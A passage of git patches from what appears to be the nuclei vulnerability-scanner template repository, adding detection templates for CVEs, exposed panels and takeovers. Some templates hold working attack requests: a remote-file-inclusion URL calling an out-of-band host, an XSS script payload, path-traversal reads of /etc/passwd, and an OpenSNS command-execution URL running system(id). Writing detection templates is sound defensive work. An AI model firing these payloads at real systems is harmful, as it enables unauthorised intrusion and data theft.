raw: @@ -33,3 +32,5 @@ requests: words: - "DeviceName" - "SerialNumber" + - "HardwareVersion" + condition: and \ No newline at end of file From 0df84657c92a0d220c18276a6d154af95d9d53ee Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Jul 2021 18:04:06 +0000 Subject: [PATCH 0322/4083] Auto Update README [Tue Jul 6 18:04:06 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 16d0e5edc4..1a1e3705fa 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 380 | vulnerabilities | 207 | exposed-panels | 184 | +| cves | 380 | vulnerabilities | 208 | exposed-panels | 184 | | takeovers | 69 | exposures | 109 | technologies | 110 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**125 directories, 1428 files**. +**125 directories, 1429 files**. From 07f3f0d988c3b71b3ca57fcb36ef2182b6deee4c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 23:44:06 +0530 Subject: [PATCH 0323/4083] Removed extra lines and few updates --- vulnerabilities/lsoft/listserv_maestro_rce.yaml | 12 +++++------- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 3c5414a0fe..39f5c96a6f 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -1,15 +1,18 @@ id: maestro-unauth-rce info: - name: LISTSERV Maestro <= 9.0-8 RCE + name: ListSERV Maestro <= 9.0-8 RCE author: b0yd - severity: high + severity: info description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. + reference: https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt requests: - method: GET path: - "{{BaseURL}}/lui/" + - "{{BaseURL}}/hub/" + matchers: - type: regex regex: @@ -17,11 +20,6 @@ requests: - 'LISTSERV Maestro\s+[5678]' condition: or - - method: GET - path: - - "{{BaseURL}}/hub/" - matchers: - - type: regex regex: - 'Administration Hub 9\.0-[123456780]' From b02708055d89db8e4dce065cda315b8b77cfc4b1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 23:52:24 +0530 Subject: [PATCH 0324/4083] Update listserv_maestro_rce.yaml --- vulnerabilities/lsoft/listserv_maestro_rce.yaml | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 39f5c96a6f..54a05eeff5 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -13,16 +13,11 @@ requests: - "{{BaseURL}}/lui/" - "{{BaseURL}}/hub/" - matchers: + extractors: - type: regex regex: - 'LISTSERV Maestro\s+9\.0-[123456780]' - 'LISTSERV Maestro\s+[5678]' - condition: or - - - type: regex - regex: - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' - part: body - condition: or + condition: or \ No newline at end of file From d8b3cbf7503774c08dff101d5d2897f24d2b88a3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 6 Jul 2021 23:53:38 +0530 Subject: [PATCH 0325/4083] Update listserv_maestro_rce.yaml --- vulnerabilities/lsoft/listserv_maestro_rce.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 54a05eeff5..d6ec7e6252 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -5,7 +5,9 @@ info: author: b0yd severity: info description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. - reference: https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt + reference: | + - https://www.securifera.com/advisories/sec-2020-0001/ + - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt requests: - method: GET From 6b88fdd41bf5544f97155d93432657f906b599a3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Jul 2021 18:25:41 +0000 Subject: [PATCH 0326/4083] Auto Update README [Tue Jul 6 18:25:41 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 1a1e3705fa..7b5c159bf6 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 380 | vulnerabilities | 208 | exposed-panels | 184 | +| cves | 380 | vulnerabilities | 209 | exposed-panels | 184 | | takeovers | 69 | exposures | 109 | technologies | 110 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**125 directories, 1429 files**. +**126 directories, 1430 files**. From 7ccfa4509ed7c4adfdd53a37fd22291c82aa4692 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 7 Jul 2021 00:53:17 +0530 Subject: [PATCH 0327/4083] Added kronos-workforce-central --- exposed-panels/kronos-workforce-central.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 exposed-panels/kronos-workforce-central.yaml diff --git a/exposed-panels/kronos-workforce-central.yaml b/exposed-panels/kronos-workforce-central.yaml new file mode 100644 index 0000000000..8dc3810292 --- /dev/null +++ b/exposed-panels/kronos-workforce-central.yaml @@ -0,0 +1,17 @@ +id: kronos-workforce-central + +info: + name: Kronos Workforce Central Panel + author: emadshanab + severity: info + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/wfc/portal' + + matchers: + - type: word + words: + - 'Kronos Workforce Central' \ No newline at end of file From cc74d3d0bead7632c67a5789cf98baf8f32ace49 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Jul 2021 19:24:33 +0000 Subject: [PATCH 0328/4083] Auto Update README [Tue Jul 6 19:24:33 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7b5c159bf6..daa2407c53 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 380 | vulnerabilities | 209 | exposed-panels | 184 | +| cves | 380 | vulnerabilities | 209 | exposed-panels | 185 | | takeovers | 69 | exposures | 109 | technologies | 110 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1430 files**. +**126 directories, 1431 files**. From 1fba6ae8824a74b4e1fba88e42ae650bb16d157e Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Jul 2021 19:44:02 +0000 Subject: [PATCH 0329/4083] Create CVE-2009-4223.yaml --- cves/2009/CVE-2009-4223.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2009/CVE-2009-4223.yaml diff --git a/cves/2009/CVE-2009-4223.yaml b/cves/2009/CVE-2009-4223.yaml new file mode 100644 index 0000000000..5b336af011 --- /dev/null +++ b/cves/2009/CVE-2009-4223.yaml @@ -0,0 +1,26 @@ +id: CVE-2009-4223 + +info: + name: KR-Web <= 1.1b2 RFI + description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents. + reference: + - https://sourceforge.net/projects/krw/ + - https://www.exploit-db.com/exploits/10216 + author: geeknik + severity: high + tags: cve,cve2009,krweb,rfi + +requests: + - method: GET + path: + - "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: interactsh_protocol + words: + - "http" From 6874823632f6fa8a65bd1852894e7e5e66f8edbf Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Jul 2021 19:47:44 +0000 Subject: [PATCH 0330/4083] Create CVE-2015-6477.yaml --- cves/2015/CVE-2015-6477.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2015/CVE-2015-6477.yaml diff --git a/cves/2015/CVE-2015-6477.yaml b/cves/2015/CVE-2015-6477.yaml new file mode 100644 index 0000000000..aefe7d8fd9 --- /dev/null +++ b/cves/2015/CVE-2015-6477.yaml @@ -0,0 +1,28 @@ +id: CVE-2015-6477 + +info: + name: Nordex NC2 'username' Parameter XSS + description: An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://seclists.org/fulldisclosure/2015/Dec/117 + - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 + author: geeknik + severity: medium + tags: cve,cve2015,xss,iot,nordex,nc2 + +requests: + - method: POST + path: + - "{{BaseURL}}/login" + body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en' + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "text/html" + - type: word + part: body + words: + - "" From c8ba8e13cea62bff6b6cc021f55073493911dac1 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Jul 2021 19:50:32 +0000 Subject: [PATCH 0331/4083] Create CVE-2017-16806.yaml --- cves/2017/CVE-2017-16806.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2017/CVE-2017-16806.yaml diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml new file mode 100644 index 0000000000..159b0732f8 --- /dev/null +++ b/cves/2017/CVE-2017-16806.yaml @@ -0,0 +1,26 @@ +id: CVE-2017-16806 + +info: + name: Ulterius Server < 1.9.5.0 - Directory Traversal + author: geeknik + reference: https://www.exploit-db.com/exploits/43141 + severity: high + tags: cve,cve2017,ulterius,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" + - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../etc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + - "\\[(font|extension|file)s\\]" + conditon: or + part: body From 7dc466904955aaaa1e3a7f70f7e729832fba7bce Mon Sep 17 00:00:00 2001 From: abison1 <72192289+abison1@users.noreply.github.com> Date: Tue, 6 Jul 2021 22:16:40 -0400 Subject: [PATCH 0332/4083] Create ceros-takeover.yaml --- takeovers/ceros-takeover.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 takeovers/ceros-takeover.yaml diff --git a/takeovers/ceros-takeover.yaml b/takeovers/ceros-takeover.yaml new file mode 100644 index 0000000000..49163a2ce8 --- /dev/null +++ b/takeovers/ceros-takeover.yaml @@ -0,0 +1,20 @@ +id: ceros-takeover + +info: + name: ceros takeover detection + author: abison_binoy + severity: high + tags: takeover + reference: https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/ + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - Sorry, page not found + - Please check the url and + condition: and From d5cbcec0798fc63c65e42f5fc25cee86e5ffb3a4 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 7 Jul 2021 03:50:13 +0000 Subject: [PATCH 0333/4083] Update CVE-2021-22214.yaml dns interaction doesn't prove exploitability --- cves/2021/CVE-2021-22214.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml index 5518bf1149..9fec2f32b0 100644 --- a/cves/2021/CVE-2021-22214.yaml +++ b/cves/2021/CVE-2021-22214.yaml @@ -27,4 +27,4 @@ requests: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - - "dns" \ No newline at end of file + - "http" From 5599b7f5374290b6dea4cdfad15d43468eaa35a3 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Wed, 7 Jul 2021 02:35:01 -0400 Subject: [PATCH 0334/4083] Update openam-detection.yaml --- technologies/openam-detection.yaml | 53 +++++++++++++++++++++++------- 1 file changed, 42 insertions(+), 11 deletions(-) diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml index 28620e5bd8..bca4734af8 100644 --- a/technologies/openam-detection.yaml +++ b/technologies/openam-detection.yaml @@ -1,20 +1,51 @@ id: openam-detection info: - name: Detect openam - author: melbadry9,xelkomy + name: Detect OpenAM and OpenSSO + author: philippedelteil severity: info - description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email. - reference: https://blog.cybercastle.io/ldap-injection-in-openam/ requests: - method: GET path: - - "{{BaseURL}}/openam/ui/PWResetUserValidation" - - "{{BaseURL}}/OpenAM-11.0.0/ui/PWResetUserValidation" - - "{{BaseURL}}/ui/PWResetUserValidation" - + - "{{BaseURL}}/openam/XUI" + - "{{BaseURL}}/XUI" + - "{{BaseURL}}/XUI/#login" + - "{{BaseURL}}/UI" + - "{{BaseURL}}/sso/XUI" + - "{{BaseURL}}/sso/UI" + - "{{BaseURL}}/sso/UI/#login" + - "{{BaseURL}}/openam/UI/login" + - "{{BaseURL}}/openam/UI/#loginlogin" + - "{{BaseURL}}/openam/UI/Login" + - "{{BaseURL}}/openam/XUI/Login" + - "{{BaseURL}}/openam/XUI/login" + - "{{BaseURL}}/openam/XUI/#login" + - "{{BaseURL}}/am/UI/Login" + - "{{BaseURL}}/am/UI/#login" + - "{{BaseURL}}/am/XUI/" + - "{{BaseURL}}/am/XUI/Login" + - "{{BaseURL}}/am/json/serverinfo/*" + - "{{BaseURL}}/openam/json/serverinfo/*" + redirects: true + max-redirects: 2 + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body, "jato.pageSession") && status_code==200' \ No newline at end of file + - type: word + words: + - 'urlArgs : "v=' + - 'Sign in to OpenAM' + - 'ForgeRock' + - 'forgerock' + - 'FRForgotUsername' + - 'successfulUserRegistrationDestination' + condition: or + - type: status + status: + - 200 + extractors: + - type: regex + part: body + group: 1 + regex: + - 'urlArgs : "v=([0-9.abcd]+)' From c3cbee27943c84210d48752431be6fe36bea54aa Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Wed, 7 Jul 2021 18:49:36 +0900 Subject: [PATCH 0335/4083] Create opensns-rce.yaml Signed-off-by: GwanYeong Kim --- vulnerabilities/other/opensns-rce.yaml | 28 ++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/other/opensns-rce.yaml diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml new file mode 100644 index 0000000000..5314c1d0ce --- /dev/null +++ b/vulnerabilities/other/opensns-rce.yaml @@ -0,0 +1,28 @@ +id: opensns-rce + +info: + name: OpenSNS RCE + author: gy741 + severity: critical + reference: http://www.0dayhack.net/index.php/2417/ + tags: opensns,rce + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)' + - '{{BaseURL}}/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)' + + matchers-condition: and + matchers: + - type: word + words: + - "Microsoft Windows" + - "uid=" + - "gid=" + - "groups=" + part: body + + - type: status + status: + - 200 From 0a484dfef59409bf7021f7dc7a6a691345f9b131 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 7 Jul 2021 15:40:23 +0530 Subject: [PATCH 0336/4083] Update and rename seats.io-login.yaml to seats-login.yaml --- exposed-panels/{seats.io-login.yaml => seats-login.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposed-panels/{seats.io-login.yaml => seats-login.yaml} (90%) diff --git a/exposed-panels/seats.io-login.yaml b/exposed-panels/seats-login.yaml similarity index 90% rename from exposed-panels/seats.io-login.yaml rename to exposed-panels/seats-login.yaml index 61481c8f3e..1c92b2e947 100644 --- a/exposed-panels/seats.io-login.yaml +++ b/exposed-panels/seats-login.yaml @@ -1,7 +1,7 @@ -id: seats.io-login +id: seats-login info: - name: seats.io login + name: Seats login author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22seats.io++%7C+login%22 From 2065dbba7e2193f04930bc5946b2bdf9ec884b4d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Jul 2021 10:12:46 +0000 Subject: [PATCH 0337/4083] Auto Update README [Wed Jul 7 10:12:46 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index daa2407c53..179c48c363 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 380 | vulnerabilities | 209 | exposed-panels | 185 | -| takeovers | 69 | exposures | 109 | technologies | 110 | +| cves | 380 | vulnerabilities | 209 | exposed-panels | 188 | +| takeovers | 69 | exposures | 109 | technologies | 112 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1431 files**. +**126 directories, 1436 files**. From 9588eadaed16122bd2a3fc1c9f3358aac61bcf40 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 7 Jul 2021 18:30:15 +0530 Subject: [PATCH 0338/4083] minor updates --- vulnerabilities/other/opensns-rce.yaml | 20 +++++++++++++------- 1 file changed, 13 insertions(+), 7 deletions(-) diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml index 5314c1d0ce..d6653c521a 100644 --- a/vulnerabilities/other/opensns-rce.yaml +++ b/vulnerabilities/other/opensns-rce.yaml @@ -1,10 +1,12 @@ id: opensns-rce info: - name: OpenSNS RCE + name: OpenSNS Remote Code Execution Vulnerability author: gy741 severity: critical - reference: http://www.0dayhack.net/index.php/2417/ + reference: | + - http://www.0dayhack.net/index.php/2417/ + - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E tags: opensns,rce requests: @@ -15,13 +17,17 @@ requests: matchers-condition: and matchers: + - type: regex + regex: + - "((u|g)id=)" + - "Microsoft Windows" + part: body + condition: or + - type: word words: - - "Microsoft Windows" - - "uid=" - - "gid=" - - "groups=" - part: body + - "/Application/" + - type: status status: From edc0f1a775ee180028b1176dd531363f8eb69758 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 7 Jul 2021 18:30:48 +0530 Subject: [PATCH 0339/4083] Update opensns-rce.yaml --- vulnerabilities/other/opensns-rce.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml index d6653c521a..a7093da6d6 100644 --- a/vulnerabilities/other/opensns-rce.yaml +++ b/vulnerabilities/other/opensns-rce.yaml @@ -28,7 +28,6 @@ requests: words: - "/Application/" - - type: status status: - 200 From 2658f3dab5b8bb3a00ae2734a68f29d7d12e3fca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Jul 2021 13:02:06 +0000 Subject: [PATCH 0340/4083] Auto Update README [Wed Jul 7 13:02:06 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 179c48c363..d879d9ae0d 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 380 | vulnerabilities | 209 | exposed-panels | 188 | +| cves | 380 | vulnerabilities | 210 | exposed-panels | 188 | | takeovers | 69 | exposures | 109 | technologies | 112 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1436 files**. +**126 directories, 1437 files**. From f2f1a569578b5d4cbf3b78361e76fd7286b32fab Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Jul 2021 13:05:48 +0000 Subject: [PATCH 0341/4083] Auto Update README [Wed Jul 7 13:05:48 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d879d9ae0d..e9731913b3 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 380 | vulnerabilities | 210 | exposed-panels | 188 | +| cves | 381 | vulnerabilities | 210 | exposed-panels | 188 | | takeovers | 69 | exposures | 109 | technologies | 112 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1437 files**. +**126 directories, 1438 files**. From 6963c0d66922dc81ed7eb2d8d17f9480c9ab96e7 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 7 Jul 2021 18:37:21 +0530 Subject: [PATCH 0342/4083] Update CVE-2015-6477.yaml --- cves/2015/CVE-2015-6477.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2015/CVE-2015-6477.yaml b/cves/2015/CVE-2015-6477.yaml index aefe7d8fd9..22bd0f786b 100644 --- a/cves/2015/CVE-2015-6477.yaml +++ b/cves/2015/CVE-2015-6477.yaml @@ -6,6 +6,8 @@ info: reference: - https://seclists.org/fulldisclosure/2015/Dec/117 - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 + - https://nvd.nist.gov/vuln/detail/CVE-2015-6477 + author: geeknik severity: medium tags: cve,cve2015,xss,iot,nordex,nc2 @@ -22,6 +24,7 @@ requests: part: header words: - "text/html" + - type: word part: body words: From 7c1109dc148c73f01a99242148f0c6c0c4280ea9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Jul 2021 13:08:08 +0000 Subject: [PATCH 0343/4083] Auto Update README [Wed Jul 7 13:08:08 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e9731913b3..c7b62705e9 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 381 | vulnerabilities | 210 | exposed-panels | 188 | +| cves | 382 | vulnerabilities | 210 | exposed-panels | 188 | | takeovers | 69 | exposures | 109 | technologies | 112 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1438 files**. +**126 directories, 1439 files**. From c8b90cb25ffeef4c9d5867ac1e389f336d7471ae Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Jul 2021 13:10:38 +0000 Subject: [PATCH 0344/4083] Auto Update README [Wed Jul 7 13:10:38 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index c7b62705e9..08fc45efec 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 382 | vulnerabilities | 210 | exposed-panels | 188 | +| cves | 383 | vulnerabilities | 210 | exposed-panels | 188 | | takeovers | 69 | exposures | 109 | technologies | 112 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1439 files**. +**126 directories, 1440 files**. From 9d78a1656b88ba32ab45a4ea0c003e6ad4318f2b Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 7 Jul 2021 18:52:35 +0530 Subject: [PATCH 0345/4083] few updates --- .../configs/configuration-listing.yaml | 18 ++++++++++++------ technologies/erp-detection.yaml | 17 ----------------- 2 files changed, 12 insertions(+), 23 deletions(-) rename vulnerabilities/other/config-detect.yaml => exposures/configs/configuration-listing.yaml (52%) delete mode 100644 technologies/erp-detection.yaml diff --git a/vulnerabilities/other/config-detect.yaml b/exposures/configs/configuration-listing.yaml similarity index 52% rename from vulnerabilities/other/config-detect.yaml rename to exposures/configs/configuration-listing.yaml index 6dc767b69c..77dafe751a 100644 --- a/vulnerabilities/other/config-detect.yaml +++ b/exposures/configs/configuration-listing.yaml @@ -1,20 +1,26 @@ -xid: configuration-files-detection +id: configuration-listing + info: - name: Sensitive Configuration Files Detection + name: Sensitive Configuration Files Listing author: j33n1k4 severity: medium description: directory listing of sensitive files reference: https://www.exploit-db.com/ghdb/7014 - tags: config,files,directory-listing + tags: config,listing,exposures + requests: - method: GET path: - "{{BaseURL}}/config/" + + matchers-condition: and matchers: - type: word words: - - "Index of" - - "/config" + - "Index of /configs" + - "Parent Directory" + condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/technologies/erp-detection.yaml b/technologies/erp-detection.yaml deleted file mode 100644 index 2f3357555b..0000000000 --- a/technologies/erp-detection.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: erp-db-detect -info: - name: ERP Database instance detection - author: j33n1k4 - severity: info - tags: database,erp -requests: - - method: GET - path: - - "{{BaseURL}}/web/database/selector" - matchers: - - type: word - words: - - "Powered by OpenERP" - - type: status - status: - - 200 From 83b9b4f341cd4d67aaef533bcc647bc09d139da4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Jul 2021 13:28:05 +0000 Subject: [PATCH 0346/4083] Auto Update README [Wed Jul 7 13:28:04 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 08fc45efec..c5cdbf0c26 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 383 | vulnerabilities | 210 | exposed-panels | 188 | -| takeovers | 69 | exposures | 109 | technologies | 112 | +| takeovers | 69 | exposures | 110 | technologies | 112 | | misconfiguration | 74 | workflows | 32 | miscellaneous | 27 | | default-logins | 36 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 13 | -**126 directories, 1440 files**. +**126 directories, 1441 files**. From 8c6b4da40a2c2e56369cf1b510f8376d511abe16 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 7 Jul 2021 19:24:39 +0530 Subject: [PATCH 0347/4083] new flag for validation --- .github/workflows/template-validate.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 1c8a0982b7..bb2001f22c 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -31,5 +31,5 @@ jobs: - name: Template Validation run: | - nuclei -t . -v + nuclei -validate -t ~/nuclei-templates/ shell: bash \ No newline at end of file From cd8e485541eafd0dd8c6e39edefc2eca9ad3311d Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 7 Jul 2021 20:51:33 +0530 Subject: [PATCH 0348/4083] Added Git Logs --- exposures/configs/git-config.yaml | 48 +++++++++++++++++++++++++++++++ git-logs | 29 ------------------- 2 files changed, 48 insertions(+), 29 deletions(-) create mode 100644 exposures/configs/git-config.yaml delete mode 100644 git-logs diff --git a/exposures/configs/git-config.yaml b/exposures/configs/git-config.yaml new file mode 100644 index 0000000000..a2326dff57 --- /dev/null +++ b/exposures/configs/git-config.yaml @@ -0,0 